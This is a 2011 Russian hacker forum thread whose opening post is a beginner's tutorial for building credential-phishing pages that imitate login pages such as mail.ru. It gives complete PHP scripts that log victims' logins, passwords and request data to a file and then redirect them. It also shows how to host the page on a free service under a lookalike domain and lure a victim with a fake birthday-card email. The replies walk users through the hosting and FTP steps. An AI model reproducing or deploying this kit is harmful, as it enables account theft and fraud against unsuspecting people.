Штампуем фэйки за 5 минут (для нубов и ленивых)

Предыдущие сообщения
10 апреля 2011
#1 kanaris uid#1 (перенесено отсюда: http://forum.hackersoft.ru/showthread.php?t=4343)

Итак, господа, хочу всем дать самый простой способ создания фейка за 5 минут. По шагам, все будет понятно даже для ламеров. Тут даже хтмл и пхп не нужно знать.
  1. Заходим на страницу, которую мы пытаемся подделать (очевидно, это страница логина). Теперь нам нужно скачать ее. Делается двумя способами.
    1. 1 способ (ламерский). Нажимаем ctrl+s в браузере на этой странице (или в меню Файл - сохранить как... сохраняете страницу на своем кампе. Если после заливки на сервак не будут грузиться картинки - поправляйте (как это делать, я рассказывать не буду, ибо догадается даже олигофрен). Преимущества этого способа - все что нужно сделать, это нажать 3 кнопки и готово.
    2. 2 способ (чуть сложнее, но чище). Нажимаем ctrl+u (в лисе), ctrl+F3 (в опере) или в меню "Вид - Исходный код страницы" (в осле). Открывается окно с исходным кодом страницы. Этот код вы копируете в файл index.php или index.html. Потом прописываем абсолютные пути ко всем картинкам и таблицам стилей (оригинальным). Это чтобы картинки и ЦССки грузились с сервака, страницу которого мы подделываем. Преимущества этого способа перед первым: все чисто, все компактненько в одном файле.
  2. Открываем блокнотом (или др. редактором исходного кода) ваш получившийся файл, ищем теги , имеющие отношение к форме логина (иногда на странице бывает несколько форм) и меняем значение аттрибута action на submit.php. Если вы не разбираетесь в HTML, найдите слово action и то, чему оно должно быть равно, установите submit.php (чтобы получилось примерно следующее: action="submit.php"). Сохраняем файл, закрываем.
  3. В той же папке создаем файл submit.php и вписываем туда следующее содержимое:
    <?php
    
    /**
     * @author hackersoft
     * @copyleft 2009
     */
    
    @include 'config.php';
    $req=array(
    	'HTTP_REFERER'=>$_SERVER['HTTP_REFERER'],
    	'HTTP_USER_AGENT'=>$_SERVER['HTTP_USER_AGENT'],
    	'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'],
    	'REMOTE_PORT'=>$_SERVER['REMOTE_PORT'],
    	'REQUEST_URI'=>$_SERVER['REQUEST_URI'],
    	'REQUEST_TIME'=>$_SERVER['REQUEST_TIME'],
    );
    $desc=fopen('logs.txt','at+');
    fwrite($desc,print_r($req,true)."\n\n\n".print_r($_REQUEST,true)."\n\n\n=====================\n\n\n");
    fclose($desc);
    
    header('Location: '.$loc);
    
    ?>
    
    затем сохраняем и закрываем.
  4. Создаем файл config.php, и копируем в него текст:
    <?php
    
    /**
     * @author hackersoft
     * @copyleft 2009
     */
    
    // куда редиректить после записи пароля:
    $loc='http://mail.ru/cgi-bin/start';
    
    ?>
    
    (не забудьте адрес поменять на нужный). Сохраняем и закрываем.
  5. Создаем пустой файл logs.txt.
  6. Ну вот, фейк готов, теперь его осталось залить и впарить жертве. Для этого регим акк на сайте http://freehostia.com (бесплатный хостер с пхп без баннеров). Называем сайт как-нибудь типа mai1-ru-.freehostia.com.
  7. Заливаем по FTP (или через панель управления) те файлы, которые вы создали.
  8. Установите на файл logs.txt привилегии "777" (ибо пароль жертвы не запишется).
  9. Теперь фейк можно впарить жертве. Напишите письмо вида:
    Привет маша! Поздравляю тебя с днем рождения и вручаю тебе эту открытку:
    http://mai1-ru-.freehostia.com/
    Маша зайдет на страницу http://mai1-ru-.freehostia.com/ и увидит форму ввода логина и пароля, как будто она разлогинелась. Если она глупая и ничего не заметит (а это уже отдельная тема, как фейк сделать менее палевным), она введет логин и пароль которые запишутся в файл logs.txt в следующем формате:
    Array
    (
        [HTTP_REFERER] => http://hackersoft.ru/admin/
        [HTTP_USER_AGENT] => Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
        [REMOTE_ADDR] => 92.112.88.666
        [REMOTE_PORT] => 34953
        [REQUEST_URI] => /admin/?action=articles
        [REQUEST_TIME] => 1230097894
    )
    
    Array
    (
        [login] => (здесь логин маши)
        [password] => (а здесь пароль)
    )
    
    =====================
    
Вот и сказочке Escape, кто не понял - F1. Будут вопросы - оставляйте в теме, но я надеюсь что все написано так, что и ежу понятно.

p.s. Этот способ универсальный, подойдет не только для mail.ru или vkontakte.ru, а вообще, для чего угодно.
02:26:13 16
5 мая 2011
#2 kanaris uid#1 Если кто не умеет создавать фэйки, кому нужно создать - создавайте заявку в этой теме: http://hackersoft.ru/talk/27/ 02:33:18 0
17 мая 2011
#3 trolo uid#122 можете объяснить что значит 8 пункт
"Установите на файл logs.txt привилегии "777" (ибо пароль жертвы не запишется)."
точнее что делать
01:12:02 0
#4 kanaris uid#1 каким фтп-клиентом пользуешься? 01:15:11 0
#5 kanaris uid#1 Короче зайди на фтп своего фэйка, выдели файл logs.txt, поищи опции этого файла. Там должно быть что-то типа "права", "привилегии", "permissions". Их выбирай, и отмечай все галочки. И сохранить. 01:17:47 0
#6 trolo uid#122 через народ, если ты про это
ок, сейчас посмотрю
01:18:54 0
#7 kanaris uid#1 хохохо, на народе не получится фэйк сделать. Там php не поддерживается. юзай freehostia.com или awardspace.com например... 01:20:44 0
#8 trolo uid#122 вот блин)
спасибо
01:22:43 0
#9 trolo uid#122 а это нормально что на фрихосте с меня хотят 9 $ взять или я что-то не то делаю? 01:47:22 0
#10 trolo uid#122 сори, разобрался 01:49:02 0
#11 trolo uid#122 на фрихосте дошел до регистрации домена и выдает это
"для домена не установлен необходимый набор серверов имён, или обновление DNS ещё не завершено."
мне нужно что-то в настройках изменять или само установиться?
19:52:05 0
#12 kanaris uid#1 Скрин в студию! Там где ты выбираешь домен, и какое сообщение нарисовало.
p.s. вообще домен там не нужно, там встроенный - *.frehostia.com
20:05:20 0
#13 trolo uid#122 http://cs11380.vkontakte.ru/u4648237/109055296/y_4...
я про красный крестик
20:22:06 0
#14 kanaris uid#1 установи в домене ns-сервера:
dns1.freehostia.com
dns2.freehostia.com
Это делается в панели управления доменом, у регистратора
22:31:17 0
#15 trolo uid#122 в принципе как установить нс я разобрался

только мне перед этим нужно зарегистрироваться тк пишет что нет доменов, зарегистрированных ими
http://cs11380.vkontakte.ru/u4648237/109055296/y_e...

но бесплатных вариантов нету
это наверно из-за того что у меня домен заканчивается *.com
если да, то как добиться *.frehostia.com ?
23:15:00 0
#16 kanaris uid#1 Неужели такая сложная админка?
Пишешь свой домен и выбираешь зону .freehostia.com
23:56:43 0
#17 Samar_Obrin uid#15 ничего там сложного нет. Просто люди никогда не включают мозги, когда есть на кого понадеяться.
А включать нужно.
Ориентируйся на строку "бесплатный".
00:11:08 0
#18 trolo uid#122 я правда пытаюсь разобраться сам
бесплатный хостинг только один там - шоколадка
http://cs11380.vkontakte.ru/u4648237/109055296/y_2...
кроме .com бесплатно не зарегится
скажите где .freehostia.com ?
00:52:54 -1
#19 SoftHack uid#10 На фрихостии кажется запретили домены вида yourdomain.freehostia.com регистрировать :( 01:02:00 0
#20 Samar_Obrin uid#15 шоколадка...пробуй на ней...я юзал её. А так же ищи другие хосты. Их не мало. 01:26:42 0
#21 trolo uid#122 я создавал на ней типа *.com и у меня возникала проблема с регистрацией домена
были только платные варианты
ты с этим не сталкивался?
07:49:48 0
#22 Samar_Obrin uid#15 я на скринах покажу:




т.е. тебе нужно просто выбрать пункт, как на втором скрине...
10:28:35 -1
#23 trolo uid#122 да, делал так
получал вот что
http://cs11380.vkontakte.ru/u4648237/109055296/y_e...
типа нету зарегистрированных

есть только в поле "поддерживается"
http://cs11380.vkontakte.ru/u4648237/109055296/y_4...

я так понял все равно нужно регистрировать
а там только платно
21:05:22 0
27 мая 2011
#24сообщение удалено
19 июня 2011
#25 eldar950 uid#312 а юкоз подойдёт для таких затей? 17:24:49 0
#26 eldar950 uid#312 спрашиваю потому как не могу разобраться с этой регой на шоколадке...
там надо реальные данные что ли вводить?
я на вводил левых, мне вылезла страничку Thanks You! с моими данными и большой кнопкой Login to control panel
захожу по кнопке, а там надо логин и пароль ввести которых я даже не знаю=(
17:36:39 0
#27 SoftHack uid#10
а юкоз подойдёт для таких затей?— eldar950
Нет
19:51:19 0
#28 eldar950 uid#312 а на счёт второго месаджа?
я прост нуб в этом деле...
но научиться хотелось бы
вот допустим я уже на несколько хостов залил нужные файлы
но допустим никаких *прав* найти нигде не смог
и если перехожу по ссылке, то попадаю на сайт вместо логина вк...
20:16:46 0
#29 eldar950 uid#312 немного не по теме счас*
я у вас на сайте первый день сижу
но за этот день много статей уже начитал=)
так то конечно увлекаюсь и хотел бы может даже по жизни этим заниматься=)
некоторое время в фсб хотел податься на защиту информации... хорошо что отговорили =)
ну так я о чём... хотел бы себя относить к 3 категории хакеров, но к сожалению сейчас вообще к хакерам себя отнести не могу=)
если бы кто-нить мб помогу разобраться во всём этом деле, а то в некоторых темах столько писанины и *нипанятных букавак*, что читать страшно
мой мозг пока не в состоянии всё это переварить, т.к. гм... *не доразвился* что ли...
и надеюсь что с сайта меня не дисмисснут за моё школотское происхождение xD
тем боле что всего 1 год осталось отмучаться=)))
ну , покорно жду ответов на всё выше написанное...
20:47:28 0
#30 kanaris uid#1 1) не в ту тему запостил
2) за молодой возраст здесь никто не дискриминирует. Дискриминируют за школотенское поведение.
А так - на здоровье ;)
20:59:12 1
#31 eldar950 uid#312 уже радует=)
но всё же хотелось бы увидеть ответы на более важные вопросы, которые именно по этой теме=))
21:02:28 0
#32 eldar950 uid#312 а то что не в ту тему, то можно перекинуть в нужную ведь=)
ну на юкозовских по крайней мере можно, тут думаю тем более))
21:04:46 0
#33 eldar950 uid#312 опять о фри хосте
создал себе даже мэйл на .com
и опять таже проблема
мне дают лист с возможностью распечатки, ну там все данные
+ (фиг знает чё это) "We are glad to inform you that your account "буквы на траслите" has been created!"

*внепонятках* и чё эт такое вообще...

на почту минут через 10 после реги пришло сообщение от фри хостии,
вот часть

You can control the contents of your website from the script's Admin Panel.

phpBB2 Admin URL: http://dns1.freehosthia.com/admin/
Login: admin
Password: (секретxD)

может кто всё же подскажет?
12:55:41 0
#34 eldar950 uid#312 так, вопрос отпал=)
с регой разобрался и даже вошёл в панельку!=)
а вот, что дальше делать я не понимаю...
13:22:12 0
#35 eldar950 uid#312 нажал на залитый файл...

http://narod.ru/disk/16562363001/%D1%81%D0%BA%D1%8...

видим разницу между тем что на ноуте, и тем что залито
ну я так понял, что русские буквы просто не читаются там...
но всё же
мб я прописал ещё что никак?
и что значит "куда куда редиректить после записи пароля"
14:28:20 0
#36 SoftHack uid#10 Юзай лучше фтп менеджер, например, FileZilla, CuteFtp или в Total Commender'e встроенный (там указываешь домен, логин и пароль от аккаунта )

А скрины на хостинги изображений заливай, например, http://www.radikal.ru/, http://imageshack.us
что значит "куда куда редиректить после записи пароля"
Куда будет перенаправлен пользователь после отправки формы
15:36:58 0
#37 eldar950 uid#312 т.е. он вписывает логин, тыкат на *вход* и его переправляет, скажем, на сайт аля *горячие школьницы* ?xD
1)нормально то, что я создал сайт dns1.freehostia.com а его нет?
2)неужто ссылка для перехода на фейк выглядит как название сайта?в голове не укладывается это...
16:28:19 0
#38 eldar950 uid#312 скажу одно.. я безнадёжный нуб по ходу=(

скачал TC, но не знаю как его добавить ftp соединение=(
там много чего-то надо прописывать и фиг знает чё писать
heelp!
16:41:19 0
#39 SoftHack uid#10
т.е. он вписывает логин, тыкат на *вход* и его переправляет, скажем, на сайт аля *горячие школьницы* ?
Да
1)нормально то, что я создал сайт dns1.freehostia.com а его нет?
В каком смысле "его нет"? :-D
2)неужто ссылка для перехода на фейк выглядит как название сайта?в голове не укладывается это...
Ссылка перехода на фейк будет именем домена, который ты зарегистрировал.
скачал TC, но не знаю как его добавить ftp соединение
Файлзиллу попробуй, там проще :)
17:05:06 0
#40 eldar950 uid#312 попробовал с неё добавить
ну видать я что то совсем мудень мармеладовый=))
вот что вижу
http://imageshack.us/content_round.php?page=done&l=img34/4180/33698788.png&via=mupload&newlp=1
_______________________________________________________________________

ну в том смысле, что сам попробуй на него зайти...
у меня в панельке пишут список сайтов
справа от моего есть столбец DNS вот там крест красный нарисован
он наверное значит, что то очень страшное...
17:28:41 0
#41 eldar950 uid#312 пордон...

http://imageshack.us/photo/my-images/34/33698788.p...
17:29:54 0
#42 SoftHack uid#10 Если используешь менеджер сайтов измени параметры:
Тип входа - обычный (не анонимный)
Хост - смотри в настройках присланных на мыло или в учётке, к какому хосту коннектиться (на фрихостии недавно сделали единый для всех аккаунтов хост)
20:48:36 0
#43 eldar950 uid#312 сделал всё так как пишут тут
НО
вот что вижу

Статус: Определение IP-адреса для newcp.freehostia.com
Статус: Соединяюсь с 66.40.52.254:443...
Статус: Соединение установлено, ожидание приглашения...

это висит секунд 10 и потом
Ошибка: Превышено время ожидания соединения
Ошибка: Невозможно подключиться к серверу
Статус: Ожидание повтора...

и как его пригласить? О_о
21:36:16 0
#44 eldar950 uid#312 HEEELP ME PLEASE!=( 17:58:57 -1
#45 SoftHack uid#10
Статус: Определение IP-адреса для newcp.freehostia.com
А ты уверен, что адрес верный?
20:43:06 0
#46 eldar950 uid#312 это я сначала туда пробовал, а потом увидел надпись FTP Host: ftp.freehostia.com
и начал пробовать туда
но его вроде как вообще найти не удаётся
я в печали=(
05:37:31 0
#47 eldar950 uid#312 а почему через панель то не работает?
написано же, что можно хоть как

http://imageshack.us/g/863/79058747.png/

вот поглядите, мб я просто очень злобно-сурово пронубил и ошибка в кодах?
05:53:44 0
#48 SoftHack uid#10 Можно и через панель заливать 07:59:52 -1
#49 SoftHack uid#10 К стати, kanaris, где в коде происходит выдерание логина и пароля из фоомы? Или они из заголовков берутся? И зачем тут скрипт с одной строкой инклудить? O-o
P.S. Я с телефона, может не заметил просто.
08:15:16 0
#50 kanaris uid#1
fwrite($desc,print_r($req,true)."\n\n\n".print_r($_REQUEST,true)."\n\n\n=====================\n\n\n");
В переменной $_REQUEST как раз и содержатся все входящие переменные (гет и пост), среди которых и есть логин и пароль.
15:12:13 1
Следующие сообщения
*Ник: Проверка уникальности... Если вы уже зарегистрированы, авторизуйтесь.
*Сообщение:
  Загрузка...